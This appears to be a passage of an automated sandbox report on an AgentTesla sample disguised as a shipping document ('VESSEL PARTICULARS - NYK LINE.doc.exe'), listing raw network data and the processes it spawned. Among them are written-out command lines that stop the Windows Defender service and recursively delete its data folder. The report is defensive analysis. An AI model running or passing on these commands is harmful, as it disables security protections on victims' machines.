                                                              2021-09-28 10:17:55 UTC160INData Raw: f1 6e 97 f3 8a 46 1e 3f d6 bb ca 51 36 50 de d3 c5 77 59 91 da 7b 0e 6f 4e 60 d4 ac 7a d2 40 bd 55 37 0f 43 17 56 a8 87 4c a4 8a 3d de 08 74 09 bf 22 44 62 3f 29 dc 8e 11 95 9c 06 4f fa f4 3a 55 64 3d 8c d0 67 4d bb ca 47 85 03 18 fa cf f8 2c 2f 01 2c 2a 6d 02 31 33 1e 30 ef 15 95 b1 23 8c f4 f5 49 f5 99 4b 02 c7 c1 1a a8 65 46 ac 4e 0f d6 96 a4 f2 43 20 fb 1a f5 e5 27 2d ad 04 35 e4 d6 e3 b6 ca 8d d2 2d 72 05 75 eb b8 88 80 5d b7 b5 93 20 d4 f8 4a 34 38 7e 9e ba 1f 7e ff 80 15 01 52 9a 42 5a 70 c9 73 1b d2 88 fa e6 39 05 b7 d9 d4 f7 4b d6 f1 bb 91 7b 54 56 2a c0 03 1e 9a eb 0d e2 b6 f2 f4 aa 53 ac 1c 47 85 8f 4d bd 3d 9c 7f 18 76 4e 16 7b 7e 9e a3 c3 be b6 8f ac ea c6 2b 81 d9 9d 7a 42 21 49 06 c7 c8 d4 6a d1 7f a5 b6 df 3d 23 ea 30 98 f6 03 8d 15 81 93
                                                              Data Ascii: nF?Q6PwY{oN`z@U7CVL=t"Db?)O:Ud=gMG,/,*m130#IKeFNC '-5-ru] J48~~RBZps9K{TV*SGM=vN{~+zB!Ij=#0
                                                              2021-09-28 10:17:55 UTC176INData Raw: 8a 15 4f 7c d7 69 aa cb 59 e2 0a c6 b8 5a 58 c2 2e c7 4a d3 f5 88 01 f7 8d c6 fe f9 cb 2e 5e e9 6f 12 04 21 e3 bb 44 01 40 29 25 08 ee 2c 8e fd 0a d5 60 05 57 ec ab 01 44 c4 fc 0a b8 fe e0 91 69 cc 05 aa a9 ea 3f 81 f8 e1 cc 3a e3 e2 e4 3b a0 71 e5 12 08 35 47 c9 3e bd 16 0e 20 0e 69 97 2d 49 f6 6b c9 cb 5c db fa 8c 8a 99 26 f7 72 4c d7 40 f5 92 2a de 76 5e 91 ba d7 21 05 50 13 d2 91 da d2 7c 6c fe 6a b1 e4 dd 7c bd fc a6 43 95 af f0 e9 68 c1 11 1b a6 41 95 e1 3e c2 ba 99 aa c4 f3 88 04 17 ef d0 75 b8 e9 e2 0d 41 bd 59 aa 01 0d 3f 0e 7b 5a 2e b7 95 e9 46 46 1e c0 d9 34 14 47 24 50 3f 0e 62 32 58 05 7a 8a 2e d2 9e ac ab 9b 1e 6a b7 78 a3 58 23 ce 9c 2e 1b e8 01 6a 61 20 4e b8 db a4 aa 97 68 1d bb 55 40 5f 4f 42 b9 1c cb 41 5f ec be 37 50 82 59 ed 3f a9 02
                                                              Data Ascii: O|iYZX.J.^o!D@)%,`WDi?:;q5G> i-Ik\&rL@*v^!P|lj|ChA>uAY?{Z.FF4G$P?b2Xz.jxX#.ja NhU@_OBA_7PY?
                                                              2021-09-28 10:17:55 UTC192INData Raw: 6c fb 9d 74 97 a9 1f 9d 66 e8 85 53 77 5c 81 ae 3a 75 16 28 8e 9d 41 01 03 81 4b e9 c3 89 4d f0 75 60 9f 0b 24 70 fe b2 25 d6 b2 0a 6f 1f 9c e1 15 60 03 91 c8 45 b6 13 63 ce be fb c2 5d 97 50 83 90 8b 73 8d 67 8f 10 bb a1 86 b7 7a 0a 8b bb d6 18 23 db b1 9c 1c d3 00 eb f3 18 31 10 56 d5 32 a3 41 50 b3 4c f9 5f d1 bf d0 dd b7 bf 6b b2 87 ec 37 52 93 61 39 70 df bf 2e 81 44 2b 80 80 df 01 f0 8d b4 49 7b 4b eb 43 95 7c e7 90 6e d0 a9 33 69 d7 76 e9 ac c1 d8 10 8e 9b 46 a6 5e a4 31 da f9 a9 cf 02 25 1c e9 c5 a5 58 51 5c ce 0b 58 3e a7 4f c0 90 7a 45 16 fc 9d 7a cd 83 27 2b 7b d8 89 b1 45 4e eb 5d 41 2d b3 20 96 91 85 75 12 6f 82 97 5d ea 0c 00 af 15 80 f2 80 85 1a 22 be f2 6d fe a5 42 db 4a c2 62 02 27 2d d3 07 76 72 09 0f 06 bf 02 81 ab 5c e4 90 ce 14 ed 00
                                                              Data Ascii: ltfSw\:u(AKMu`$p%o`Ec]Psgz#1V2APL_k7Ra9p.D+I{KC|n3ivF^1%XQ\X>OzEz'+{EN]A- uo]"mBJb'-vr\
                                                              2021-09-28 10:17:55 UTC208INData Raw: ef f6 ee f7 c6 9a 0a 09 e8 91 a0 5c a3 82 45 de 0e 09 76 60 11 27 c6 7b 6a a8 c8 20 19 8f a3 28 ed 2b 55 81 43 7f 00 67 07 79 ec 3a e0 91 d2 aa 57 1e 50 59 90 f2 76 0c 42 ca a9 df cd 88 f3 55 dd cc 22 33 3b 2a 6b e5 e6 18 fb 1c 8f 0e 19 cb 74 14 6d d5 21 ee 16 7e fe 4f 1e 99 bf 9a ec b3 05 7e f8 b3 a3 ee b7 bd 15 14 f8 ba 63 22 e7 bd 2f e4 54 29 8d a1 16 86 56 3e 85 c4 38 af ab 18 ce 2d 60 ac 14 32 f5 37 a2 f5 03 4f 6a 0c 07 58 05 36 85 8d 7e 8c f5 08 3e b2 cc 5b d7 c1 fe 46 6e 55 e5 63 6e 61 c3 58 ec e5 33 5e f4 eb cd 5d f2 f2 c5 27 08 3a 45 59 01 e7 94 45 ae 32 42 c8 93 09 3c 37 c6 a7 88 56 02 e0 51 8d 3c 33 18 c9 fa ff 79 bc 4a 93 0e 98 d2 b0 cc c7 c9 35 97 6e 9a 95 b7 0f eb 74 f3 7a f1 b4 22 93 95 3c 5d 85 74 b5 24 5a f6 15 fd d4 30 cc a6 a8 f8 aa 63
                                                              Data Ascii: \Ev`'{j (+UCgy:WPYvBU"3;*ktm!~O~c"/T)V>8-`27OjX6~>[FnUcnaX3^]':EYE2B<7VQ<3yJ5ntz"<]t$Z0c
                                                              2021-09-28 10:17:55 UTC224INData Raw: f6 f5 66 67 d3 5b 78 e7 41 62 5c 9c 0c 5b a9 66 20 56 cc 73 8b 62 70 b9 ad 78 44 ab ef f1 81 5b 03 53 fd 82 bf ef f7 80 ba b7 57 2b 46 f6 bb 24 08 7f 2c 92 65 73 35 34 87 50 ac 3a 57 e3 ca 7e d7 c9 78 ba e3 27 45 bd a7 75 72 a6 02 45 df df 67 83 3b 1a 47 4a 13 92 8a d9 db 30 35 ff 51 6b 28 c6 23 52 8d 80 c7 7b 82 f6 98 17 5a da 2f 46 39 45 31 b8 48 7d 3f d2 a5 96 5b f6 d7 7b b1 2d fb 99 10 43 8b 42 fa 83 ae 65 13 64 a9 2b a5 4c 89 ac 52 a5 be 4f c5 72 aa b7 6a 1e cc ba 3a 6b 68 9f 11 5a ef a1 e8 cb da 54 9e 1e 3a 61 11 66 5d 79 d5 23 47 03 94 9b d4 cb 7b 84 5a b5 19 21 5a 79 de 37 ef 30 03 02 ed 7e be c2 2f 72 6e f8 c5 3e e4 c3 58 a2 6f 55 17 4d aa ba 7b d6 ed 4d 67 d8 c0 4e 67 7a 42 b1 87 f6 b2 b8 df a0 95 7f 56 45 a1 85 23 29 c1 e7 d0 61 37 17 3f 4c a2
                                                              Data Ascii: fg[xAb\[f VsbpxD[SW+F$,es54P:W~x'EurEg;GJ05Qk(#R{Z/F9E1H}?[{-CBed+LROrj:khZT:af]y#G{Z!Zy70~/rn>XoUM{MgNgzBVE#)a7?L


                                                              Code Manipulations

                                                              Statistics

                                                              Behavior

                                                              Click to jump to process

                                                              System Behavior

                                                              Analysis Process: VESSEL PARTICULARS - NYK LINE.doc.exe PID: 5204 Parent PID: 3488

                                                              General

                                                              Start time:12:17:19
                                                              Start date:28/09/2021
                                                              Path:C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:'C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exe'
                                                              Imagebase:0xbb0000
                                                              File size:393216 bytes
                                                              MD5 hash:93445DF2C96362810E0395C5C867700E
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:.Net C# or VB.NET
                                                              Yara matches:
                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.503892800.0000000003E61000.00000004.00000001.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000000.00000002.503892800.0000000003E61000.00000004.00000001.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000003.493088206.00000000040F8000.00000004.00000001.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000000.00000003.493088206.00000000040F8000.00000004.00000001.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.503807801.0000000002FF2000.00000004.00000001.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000000.00000002.503807801.0000000002FF2000.00000004.00000001.sdmp, Author: Joe Security
                                                              Reputation:low

                                                              Analysis Process: powershell.exe PID: 1688 Parent PID: 5204

                                                              General

                                                              Start time:12:17:27
                                                              Start date:28/09/2021
                                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Test-Connection www.bing.com
                                                              Imagebase:0x1f0000
                                                              File size:430592 bytes
                                                              MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:.Net C# or VB.NET
                                                              Reputation:high

                                                              Analysis Process: powershell.exe PID: 5176 Parent PID: 5204

                                                              General

                                                              Start time:12:17:27
                                                              Start date:28/09/2021
                                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Test-Connection www.google.com
                                                              Imagebase:0x1f0000
                                                              File size:430592 bytes
                                                              MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:.Net C# or VB.NET
                                                              Reputation:high

                                                              Analysis Process: conhost.exe PID: 5236 Parent PID: 1688

                                                              General

                                                              Start time:12:17:27
                                                              Start date:28/09/2021
                                                              Path:C:\Windows\System32\conhost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              Imagebase:0x7ff7ecfc0000
                                                              File size:625664 bytes
                                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high

                                                              Analysis Process: conhost.exe PID: 4124 Parent PID: 5176

                                                              General

                                                              Start time:12:17:27
                                                              Start date:28/09/2021
                                                              Path:C:\Windows\System32\conhost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              Imagebase:0x7ff7ecfc0000
                                                              File size:625664 bytes
                                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high

                                                              Analysis Process: powershell.exe PID: 5512 Parent PID: 5204

                                                              General

                                                              Start time:12:17:27
                                                              Start date:28/09/2021
                                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Test-Connection www.facebook.com
                                                              Imagebase:0x1f0000
                                                              File size:430592 bytes
                                                              MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:.Net C# or VB.NET
                                                              Reputation:high

                                                              Analysis Process: conhost.exe PID: 6184 Parent PID: 5512

                                                              General

                                                              Start time:12:17:28
                                                              Start date:28/09/2021
                                                              Path:C:\Windows\System32\conhost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              Imagebase:0x7ff797770000
                                                              File size:625664 bytes
                                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high

                                                              Analysis Process: powershell.exe PID: 6896 Parent PID: 5204

                                                              General

                                                              Start time:12:17:39
                                                              Start date:28/09/2021
                                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Test-Connection www.twitter.com
                                                              Imagebase:0x1f0000
                                                              File size:430592 bytes
                                                              MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:.Net C# or VB.NET
                                                              Reputation:high

                                                              Analysis Process: conhost.exe PID: 6904 Parent PID: 6896

                                                              General

                                                              Start time:12:17:39
                                                              Start date:28/09/2021
                                                              Path:C:\Windows\System32\conhost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              Imagebase:0x7ff7ecfc0000
                                                              File size:625664 bytes
                                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language

                                                              Analysis Process: AdvancedRun.exe PID: 6200 Parent PID: 5204

                                                              General

                                                              Start time:12:18:57
                                                              Start date:28/09/2021
                                                              Path:C:\Users\user\AppData\Local\Temp\AdvancedRun.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:'C:\Users\user\AppData\Local\Temp\AdvancedRun.exe' /EXEFilename 'C:\Windows\System32\sc.exe' /WindowState 0 /CommandLine 'stop WinDefend' /StartDirectory '' /RunAs 8 /Run
                                                              Imagebase:0x400000
                                                              File size:91000 bytes
                                                              MD5 hash:17FC12902F4769AF3A9271EB4E2DACCE
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Antivirus matches:
                                                              • Detection: 0%, Virustotal, Browse
                                                              • Detection: 3%, Metadefender, Browse
                                                              • Detection: 0%, ReversingLabs

                                                              Analysis Process: AdvancedRun.exe PID: 5296 Parent PID: 6200

                                                              General

                                                              Start time:12:19:02
                                                              Start date:28/09/2021
                                                              Path:C:\Users\user\AppData\Local\Temp\AdvancedRun.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:'C:\Users\user\AppData\Local\Temp\AdvancedRun.exe' /SpecialRun 4101d8 6200
                                                              Imagebase:0x400000
                                                              File size:91000 bytes
                                                              MD5 hash:17FC12902F4769AF3A9271EB4E2DACCE
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language

                                                              Analysis Process: AdvancedRun.exe PID: 1308 Parent PID: 5204

                                                              General

                                                              Start time:12:19:05
                                                              Start date:28/09/2021
                                                              Path:C:\Users\user\AppData\Local\Temp\AdvancedRun.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:'C:\Users\user\AppData\Local\Temp\AdvancedRun.exe' /EXEFilename 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' /WindowState 0 /CommandLine 'rmdir 'C:\ProgramData\Microsoft\Windows Defender' -Recurse' /StartDirectory '' /RunAs 8 /Run
                                                              Imagebase:0x400000
                                                              File size:91000 bytes
                                                              MD5 hash:17FC12902F4769AF3A9271EB4E2DACCE
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language

                                                              Analysis Process: AdvancedRun.exe PID: 6276 Parent PID: 1308

                                                              General

                                                              Start time:12:19:11
                                                              Start date:28/09/2021
                                                              Path:C:\Users\user\AppData\Local\Temp\AdvancedRun.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:'C:\Users\user\AppData\Local\Temp\AdvancedRun.exe' /SpecialRun 4101d8 1308
                                                              Imagebase:0x400000
                                                              File size:91000 bytes
                                                              MD5 hash:17FC12902F4769AF3A9271EB4E2DACCE
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language

                                                              Analysis Process: VESSEL PARTICULARS - NYK LINE.doc.exe PID: 6248 Parent PID: 5204

                                                              General

                                                              Start time:12:19:14
                                                              Start date:28/09/2021
                                                              Path:C:\Users\user\AppData\Local\Temp\VESSEL PARTICULARS - NYK LINE.doc.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Users\user\AppData\Local\Temp\VESSEL PARTICULARS - NYK LINE.doc.exe
                                                              Imagebase:0x200000
                                                              File size:393216 bytes
                                                              MD5 hash:93445DF2C96362810E0395C5C867700E
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Antivirus matches:
                                                              • Detection: 100%, Joe Sandbox ML
                                                              • Detection: 59%, Virustotal, Browse
                                                              • Detection: 31%, Metadefender, Browse
                                                              • Detection: 86%, ReversingLabs

                                                              Analysis Process: VESSEL PARTICULARS - NYK LINE.doc.exe PID: 6412 Parent PID: 5204

                                                              General

                                                              Start time:12:19:14
                                                              Start date:28/09/2021
                                                              Path:C:\Users\user\AppData\Local\Temp\VESSEL PARTICULARS - NYK LINE.doc.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Users\user\AppData\Local\Temp\VESSEL PARTICULARS - NYK LINE.doc.exe
                                                              Imagebase:0xd0000
                                                              File size:393216 bytes
                                                              MD5 hash:93445DF2C96362810E0395C5C867700E
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language

                                                              Analysis Process: VESSEL PARTICULARS - NYK LINE.doc.exe PID: 2316 Parent PID: 5204

                                                              General

                                                              Start time:12:19:15
                                                              Start date:28/09/2021
                                                              Path:C:\Users\user\AppData\Local\Temp\VESSEL PARTICULARS - NYK LINE.doc.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Users\user\AppData\Local\Temp\VESSEL PARTICULARS - NYK LINE.doc.exe
                                                              Imagebase:0xc0000
                                                              File size:393216 bytes
                                                              MD5 hash:93445DF2C96362810E0395C5C867700E
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language

                                                              Analysis Process: VESSEL PARTICULARS - NYK LINE.doc.exe PID: 6320 Parent PID: 5204

                                                              General

                                                              Start time:12:19:15
                                                              Start date:28/09/2021
                                                              Path:C:\Users\user\AppData\Local\Temp\VESSEL PARTICULARS - NYK LINE.doc.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Users\user\AppData\Local\Temp\VESSEL PARTICULARS - NYK LINE.doc.exe
                                                              Imagebase:0x2f0000
                                                              File size:393216 bytes
                                                              MD5 hash:93445DF2C96362810E0395C5C867700E
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language

                                                              Analysis Process: VESSEL PARTICULARS - NYK LINE.doc.exe PID: 5088 Parent PID: 5204

                                                              General

                                                              Start time:12:19:16
                                                              Start date:28/09/2021
                                                              Path:C:\Users\user\AppData\Local\Temp\VESSEL PARTICULARS - NYK LINE.doc.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Users\user\AppData\Local\Temp\VESSEL PARTICULARS - NYK LINE.doc.exe
                                                              Imagebase:0x110000
                                                              File size:393216 bytes
                                                              MD5 hash:93445DF2C96362810E0395C5C867700E
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language

                                                              Analysis Process: VESSEL PARTICULARS - NYK LINE.doc.exe PID: 4124 Parent PID: 5204

                                                              General

                                                              Start time:12:19:17
                                                              Start date:28/09/2021
                                                              Path:C:\Users\user\AppData\Local\Temp\VESSEL PARTICULARS - NYK LINE.doc.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Users\user\AppData\Local\Temp\VESSEL PARTICULARS - NYK LINE.doc.exe
                                                              Imagebase:0x250000
                                                              File size:393216 bytes
                                                              MD5 hash:93445DF2C96362810E0395C5C867700E
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language

                                                              Disassembly

                                                              Code Analysis

                                                              Reset < >